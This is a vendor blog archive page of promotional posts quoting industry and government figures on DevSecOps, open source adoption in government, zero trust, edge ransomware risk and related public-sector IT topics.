Building a DevSecOps Culture

Posted on by Rich Savage

As software becomes more sophisticated, it plays an increasingly important role in all aspects of government operations. However, given the complexity and intertwined nature of modern software, any vulnerability could have wide-ranging consequences, which makes security of vital importance. The federal government has taken notice. A number of recent policy directives address issues related to the software supply chain, and key agencies are leading a governmentwide effort to promote secure software development, including the Executive Order on Transforming Federal Customer Experience and Service Delivery to Rebuild Trust and the Executive Order on Improving the Nation’s Cybersecurity. Learn how you can implement DevSecOps to support your journey to secure, innovative software in Carahsoft’s Innovation in Government® report.

The Mindset Shift that Enables DevSecOps

“In an ideal world, technology and processes support team members’ ability to deliver on their particular talents. Before agencies implement DevSecOps methodologies, they should identify where their processes are getting bottlenecked and forcing people to either work around them or fundamentally change their behavior. Instead, we want to make it easy for employees to do the right thing. The goal is to enable people to focus on what they do best — regardless of where they operate in the stack or the tools they are using — so that agencies can build and deploy secure, modern apps.”

Read more insights from Alex Barbato, Public Sector Solutions Engineer at VMware.

How Generative AI Improves Software Security

“Generative AI tools are becoming increasingly prevalent, providing interactive experiences that captivate the public’s imagination. These tools are accessible to anyone, offering a unique opportunity to engage and explore the creative possibilities enabled by AI technology. The technology doesn’t just train a model to recognize patterns. It can create things that are easy to understand: images, text, even videos. Sometimes the results are hilariously wrong, but other times the results are quite impressive, such as clear, concise answers to complex questions. Generative pre-trained transformer (GPT) technology, such as ChatGPT, has opened the doors for everyone to be an evaluator because the output is accessible and easy to critique.”

Read more insights from Robert Larkin, Senior Solutions Architect at Veracode.

Open Source is at the Heart of Software Innovation

“Embedding security into applications from the start is essential for streamlining and strengthening the entire development life cycle. Securing the software supply chain is a related effort that is of vast importance to government operations. Beyond securing individual applications, the ultimate goal is to build security into the pipeline itself. At each step and every handoff, we must be able to verify who has touched the software and who did what to ensure that the end result is what we intended to build and that nothing malicious has been injected along the way.”

Read more insights from Chris Mays, Staff Specialist Solutions Architect at Red Hat.

DevSecOps Needs Tool Diversity and Collaboration

“As DevSecOps methodologies and software factories grow in prevalence, agencies are recognizing that software development is a team sport — inside the agency, across departments and with external stakeholders. It touches many different teams, but getting everyone on the same page with tooling can be difficult. Different teams prefer different tools, and that makes collaboration hard. Modern software development brings security practices forward in the timeline while reducing duplication of efforts and improving real-time accountability. Success hinges on removing blockers, creating visibility and making sure collaboration is happening at every stage. In addition, encouraging input from different areas of the organization from the beginning and throughout development is vital for innovation.”

Read more insights from Ben Straub, Head of Public Sector at Atlassian.

Observability Speeds Zero Trust and Application Security

“In response to increasing cyberthreats, the government is speeding up the move to zero trust. This security model assumes that every user, request, application and non-human entity is not to be trusted until its identity can be verified. Zero trust principles require a layered defense that is more effective when rooted in observability. To develop an architecture that validates and revalidates every entity on the network, it is necessary to know what those entities are, how they’re communicating and how they typically behave so we can recognize deviations. Zero trust and observability technologies work together to create a more secure and resilient network environment by assuming that all requests for access are untrusted and continuously monitoring the network to detect and respond to potential threats.”

Read more insights from Willie Hicks, Public Sector Chief Technologist at Dynatrace.

The Role of a Service Mesh in Zero Trust Success

“For large companies and government agencies, it’s safe to assume that a committed attacker is already inside their networks. Executive Order 14028 mandates that every federal agency develop a Zero Trust architecture because it is the most effective approach to mitigating what attackers can do once they’ve made their way inside. What does Zero Trust look like at runtime? One of the key considerations is identity-based segmentation, which involves conducting five policy checks for every request in the system: encrypted connection between service endpoints, service authentication, service-to-service authorization, end user authentication, and end user-to-resource authorization.”

Read more insights from Zack Butcher, Founding Engineer at Tetrate and co-author of the NIST SP 800-200 series and SP 800-207A.

AI and the Journey to Secure Software Development

“By automating and optimizing DevSecOps workflows, we can still shift security left while relieving developers from the burden of some complex remediation. It begins with a workflow that leverages fully automated security scanning to rapidly identify vulnerabilities as well as providing suggested remediation for vulnerabilities and on-demand remediation training to educate developers on what they are getting into. The rapid evolution of artificial intelligence is making new advances possible. The opportunities go well beyond AI-assisted code creation. AI features are being expanded across the entire software development life cycle. When it comes to security, having AI assist by making code functionality clear or explaining a vulnerability in detail reduces the time required to remediate risk.”

Read more insights from Joel Krooswyk, Federal CTO at GitLab.

Scaling App Development While Meeting Security Standards

“The dream for any software development team is constant, stable releases. The faster teams get the work they’ve created into production, the faster the agency can derive value from that work. When app development is stymied by cumbersome security reviews and stability testing and by the need to wait for a deployment window, innovation is stifled and the return on investment is delayed. If agencies want to have efficient, value-driving software development teams, those teams must be able to move with agility. A trustworthy, scalable DevOps pipeline that brings together testing and security in a seamless way allows teams to push out new apps and improvements quickly so government employees and citizens can have a seamless digital experience and the most up-to-date tools and information.”

Read more insights from Kyle Tobener, Head of Security and IT at Copado.

Join us in-person for our must-attend DevSecOps Conference—an exciting day of exhibits, speaking sessions, and networking events. We look forward to showcasing new DevSecOps updates from our supporting panels featuring government, systems integrators, and industry thought leaders.

Download the full Innovation in Government® report for more insights from DevSecOps thought leaders and additional industry research from FCW.

The Open Source Revolution in Government

Posted on by Natalie Gregory

Open source technology accounts for a significant portion of most modern applications, with some estimates going as high as 90%, and it is the foundation of many mainstream technologies. Its strength lies in the fact that a vibrant ecosystem of developers contribute to and continually improve the underlying code, which keeps the software dynamic and responsive to changing needs. Enterprise open source software further augments these community-driven projects by providing enterprise-grade support and scalability, while retaining the innovation and flexibility driven by the open source development model. By providing the best of both worlds, such solutions represent a powerful arsenal of tools for addressing government’s most pressing challenges. In a recent pulse survey of FCW readers, 93% of respondents said they were using open source technology. And more than half of respondents to FCW’s survey see open source as an integral resource for strengthening cybersecurity. That number reflects a positive trend toward a better understanding of open source software’s intrinsic approach to security. The power of enterprise open source technologies lies in a combination of collaboration, transparency and industry expertise. As agencies expand their use of such technologies, they maximize their ability to achieve mission success in the most secure, agile and innovative way possible. Learn how the combined power of community-driven innovation and industry-leading technical support is expanding the government’s capacity for transformation in Carahsoft’s Innovation in Government® report.

Why Open Source is a Mission-Critical Foundation

“Open source transforms the way agencies manage hybrid and multi-cloud environments. The most critical technology in the cloud, across all providers, is Linux. Everything is built on top of that foundation — both the infrastructure of the cloud and cloud offerings. Given the right partner, the promise of Linux is that it provides a consistent technology layer for agencies across all footprints, including multiple cloud providers, on-premises data centers and edge environments. From that foundation, agencies and their partners can build portable architectures that leverage other open source technologies. Portability gives organizations the ability to use the same architectures, underlying technologies, monitoring and security solutions, and human skills to manage mission-critical capabilities across all footprints.”

Read more insights from Christopher Smith, Vice President and General Manager of the North America Public Sector at Red Hat.

How Open Source is Expanding its Mission Reach

“The real power of open source technologies was revealed when they cracked the code on being highly powered, mission-specific, distributed systems. That’s how we are able to get insights out of data by being able to hold it and query it. Today, open source innovation is being accelerated by the cloud, and the conversation is still changing, with people now demanding that their open source companies be cloud-first platforms. Along the way, the open source technologies that start in the community and then receive a boost of commercial innovation have matured. The most powerful ones are expanding their ability to address more of the government’s mission needs. They are staying interoperable and keeping the data interchange non-proprietary, which is important for government agencies.”

Read more insights from David Erickson, Senior Director of Solutions Architecture at Elastic.

The Open Source Community’s Commitment to Security

“A central tenet of software development is visibility and traceability from start to finish so that a developer can follow the code through development, testing, building and security compliance, and then into the final production environment. Along the way, there are some key activities that boost collaboration and positive outcomes, starting with early code previews, where developers can spin up an application for stakeholders to review. Other activities include documented code reviews by peers to ensure the code is well written and efficient. In addition, DevOps components such as open source, infrastructure as code, Kubernetes as a deployment mechanism, automated testing, and better platforms and capabilities have helped developers move away from building ecosystems and instead focus on innovation.”

Read more insights from Joel Krooswyk, Federal CTO at GitLab.

The Limitless Potential of an Open Source Database

“One of the most important elements of any database migration is ensuring that proper planning and due diligence have been performed to ensure a smooth and successful deployment. In addition, there are some key considerations agencies should keep in mind when moving to open source databases. It is essential to start with a clear understanding of the business case and objectives for adopting an open source approach. Agencies also need to decide how the database should function and what it should do to support their digital transformation. Then they must choose the optimal method to deploy the database.”

Read more insights from Jeremy A. Wilson, CTO of the North America Public Sector at EDB.

Modernizing Digital Services with Open Source

“A composable, open source digital experience platform (DXP) enables agencies to overcome those challenges. Open source technology is continuously contributed to by a community of developers to reflect a wide array of needs across organizations in varying industries and of varying sizes. A composable approach allows agencies to assemble a number of solutions for a fast, efficient system that is tailored to their needs. When agencies combine a composable DXP with open source technology, they have access to best-of-breed software and the ability to customize the assembly to suit their requirements. An enterprise DXP will enable agencies to achieve a 360-degree view of how constituents are engaging with their digital services and gain valuable data to understand how to enhance their experience. Finally, a composable, open source DXP provides a proactive approach to protecting against security and compliance vulnerabilities.”

Read more insights from Tami Pearlstein, Senior Product Marketing Manager at Acquia.

Creating Secure Open Source Repositories

“Protecting the software supply chain requires looking at every single thing that might come into an agency’s environment. To understand that level of visibility, I like to use the analogy of a refrigerator. All the ingredients necessary to make a cake or pie are in the refrigerator. We know they are of good quality, and other teams can use them instead of having to find their own. At Sonatype, our software equivalent of a refrigerator is the Nexus Repository Manager. A second aspect of our offering, called Lifecycle, allows us to evaluate the open source components in repositories at every stage of the software development life cycle. One piece of software can download a thousand other components. How do we know if one of those components is malicious?”

Read more insights from Maury Cupitt, Regional Vice President of Sales Engineering at Sonatype.

Better Data Flows for a Better Customer Experience

“A more responsive and personalized customer experience isn’t much different from the initial problem set that gave birth to Apache Kafka. When people interact with agencies, they want those agencies to know who they are and how they’ve interacted in the past. They don’t want to be asked for their Social Security number three times on the same phone call. They also expect that the information or service they receive will be the same whether they are accessing it over the phone, via a mobile app and on a website. To elevate the quality of their service, agencies must be able to stream information in a low-friction way so different systems are consistent with one another and up-to-date at all times, regardless of the communication channel an individual uses. President Joe Biden’s executive order about transforming the federal customer experience is based on this capability. The most successful companies across industries have figured out how to do it, and for the most part, they’ve done it with open source software.”

Read more insights from Jason Schick, General Manager of Confluent US Public Sector.

An Open Source Approach to Data Analytics

“For the past 40 years, agencies have used data warehouses to collect and analyze their data. Although those warehouses worked well, they were limited in what they could do. For instance, they could only handle structured data, but by some estimates, 90% of agencies’ data is unstructured and in the form of text, images, audio, video and the like. Furthermore, proprietary data warehouses can show agencies what has happened in the past but can’t predict what might happen in the future. To achieve the government’s goal of evidence-based decision-making, agencies need to be able to tap into all their data and predict what might come next.”

Read more insights from Howard Levenson, Regional Vice President at Databricks.

Download the full Innovation in Government® report for more insights from these open source thought leaders and additional industry research from FCW.

Conversations With CXOs: Crash Course on the Future of Government

Posted on by The Carahsoft Team

For government employees looking to build successful and satisfying careers in public service, the curriculum is changing. It’s not enough to develop mastery of agency processes and policies or to stockpile continuing education credits on traditional core competencies. Instead, public servants need to develop a working knowledge of current trends in IT and management that are reshaping how government operates. IT and management: That’s the operative phrase. Technology is continually improving the efficiency of work processes and the productivity of employees. But efficiency and productivity only go so far. It’s at the intersection of technology and management that real change is happening. Agencies are gaining new insights into their operations and services, and using those insights to fuel innovations across their organizations. Government employees at all levels have the opportunity to be part of this transformation, but they need to get up to speed on the key trends. Where are they to begin? Download the guide to read more about four competencies that could be critical to the careers of public servants.

Edge Computing Raises Ransomware Risk

“The problem is that edge computing – in which data is being aggregated, accessed or processed outside the network perimeter – is leaving data exposed to cyber criminals who see an opportunity to make money through ransomware schemes. According to Gartner, a research and consulting firm, edge computing will grow 75% by 2025. In government, the surge is being fueled both by a growth in end-user devices in mobile and remote computing and in non-traditional devices associated with the Internet of Things (IoT) and operational technology (OT), such as sensors and cameras. In many cases, agencies support edge computing by moving data into the cloud, rather than requiring end-users or devices to go through the data center. This hybrid cloud environment mitigates performance and latency problems but also makes the network perimeter even more porous.”

Read more insights from HPE’s Distinguished Technologist for Cyber Security, James M.T. Morrison.

Agencies Need to Maintain a Sense of Cyber Urgency

“Security isn’t just the responsibility of individuals. Agencies also must ensure they treat security as a top priority. SolarWinds recommends two areas of focus: Prioritize the development of cyber experts. Given the high demand for cyber experts, agencies should focus more energy on developing talent in house. Shopp said one approach is to convert IT professionals, who are already tech savvy, into cyber professionals. Prioritize collaboration between tech pros and leaders. Policies and strategies aimed at reducing risk should reflect both technical and organizational expertise and requirements. Shopp said agencies also should collaborate more with trusted industry partners. SolarWinds, for example, isn’t just a technology vendor; it also has a large development shop, as many government agencies do, and can exchange ideas about cyber strategies, tools, and best practices.”

Read more insights from SolarWinds’ Group Vice President of Product Management, Brandon Shopp.

How to Move DevOps from Disarray to Unity

“An agency’s initial forays into integrating their development and operations teams can bear fruit quickly, leading to better quality software produced at a faster clip. The risk is that an organization will treat its initial forays as the endgame, not realizing that a more mature approach, with greater payoffs, is possible. In short, the DevOps initiatives never grow up. GitLab, which has years of experience helping organizations with DevOps adoption, has identified four stages in a DevOps journey, culminating in an approach that delivers even greater benefits than envisioned at the outset.”

Read more insights from GitLab’s Federal Solutions Architect, Sameer Kamani, and Senior Public Sector Solutions Architect, Daniel Marquard.

Why Stronger Security Hinges on Identity Data

“To understand the need for an Intelligent Identity Data Platform, consider two scenarios. In the first case, a user logs into an application from her office at 2 p.m. each day. In this case, she will be considered a low risk, based on three factors: Her credentials, her usage patterns and location data. In the second scenario, this same user logs into the application from her office but at 2 a.m. The aberration in her routine (i.e., usage pattern) raises a red flag, as would a change in her location. Even this simple use case requires an agency to have a holistic picture of an end-user, which is not possible without a central platform.”

Read more insights from Radiant Logic’s Vice President of Solutions Architects and Senior Technical Evangelist, Wade Ellery.

The Case for Data Literacy

“Someone who works in national defense requires different data skills from those in environmental or financial management auditing. ‘We firmly believe it’s not a one-size-fits-all approach,’ Ariga said. Training must be catered to tradecraft. It’s the reason GAO is creating its own data literacy curriculum specific to the oversight community, instead of relying on third-party training that focuses on generic, often commercial aims. Additionally, the best time for people to learn data skills is when they actually need them. On-demand tools such as microlearning videos and a walk-in Genius Bar ensure staff can access data solutions and build literacy when they need, instead of waiting months to register for a class.”

Read more insights from the Government Accountability Office’s Chief Data Scientist and Director of the Innovation Lab, Taka Ariga.

The Future of AI Hangs on Ethics, Trust

“Over the next five years or so, we could see a revolution in the use of AI, Sivagnanam said. Think about the self-driving car industry. At this point, human drivers are still a necessary part of the equation. But AI pioneers are hard at work trying to change that, and quickly. Similar advances are likely in other applications of AI. Over the next three to five years, Sivagnanam hopes to see the AI industry mature. As part of that, he expects to see the development of regulations and guidelines around AI and ethics, both from the federal government and from industry organizations. That work is already getting underway, and NSF is playing a role. Through a grants program called Fairness in Artificial Intelligence (FAI), NSF supports researchers working on ethical challenges in AI.”

Read more insights from the U.S. National Science Foundation’s Chief Architect, Chezian Sivagnanam.

Q&A: Getting Schooled on Zero Trust Security

“Zero trust means zero trust. We’re monitoring your internal systems. To an extent, we are monitoring what individuals are doing. That’s not to say we’re Big Brother. We’re not monitoring the keystrokes of every user in the state or anything like that. For the agencies, multi-factor [authentication] is a huge one. We’ve seen time and time again accounts get compromised because they had a bad username and password. If that’s the only thing protecting a system, that’s not enough. The bottom line is we know people create bad passwords. That’s a given. You can increase awareness about how to create good passwords, and you certainly want to try that. In many cases, people will just figure out ways around complexity requirements to get an easy-to-remember password versus a secure and strong password. You want to encourage people to have unique passwords for every single site. At some point, you need to give them a secure method of being able to remember all these passwords.”

Read more insights from Connecticut’s CISO, Jeff Brown.

3 Tenets for Advancing Equity in Your Everyday Work

“If there were one thing you could do to eliminate health disparities or advance health equity, what would it be? This is a question that Dr. Leandris Liburd gets asked often, but it’s not one she’s fond of. The answer isn’t a simple one, and the COVID-19 pandemic has magnified that truth. There isn’t a magic pill to ensure that no one is denied the possibility of being healthy because they belong to a group that has been economically or socially disadvantaged. And measuring success is about more than data points. Choosing one thing to advance health equity ‘is not possible when you’re dealing with these kinds of complexities,’ Liburd said in an interview with GovLoop. ‘So we have to do a lot of things at the same time.’”

Read more insights from the CDC’s Director of the Office of Minority Health and Health Equity, Dr. Leandris Liburd.

Download the full GovLoop Guide for more insights from chief information officers, a chief data scientist and other senior leaders in federal, state and local government.

| Carahsoft

Tag Archives: GitLab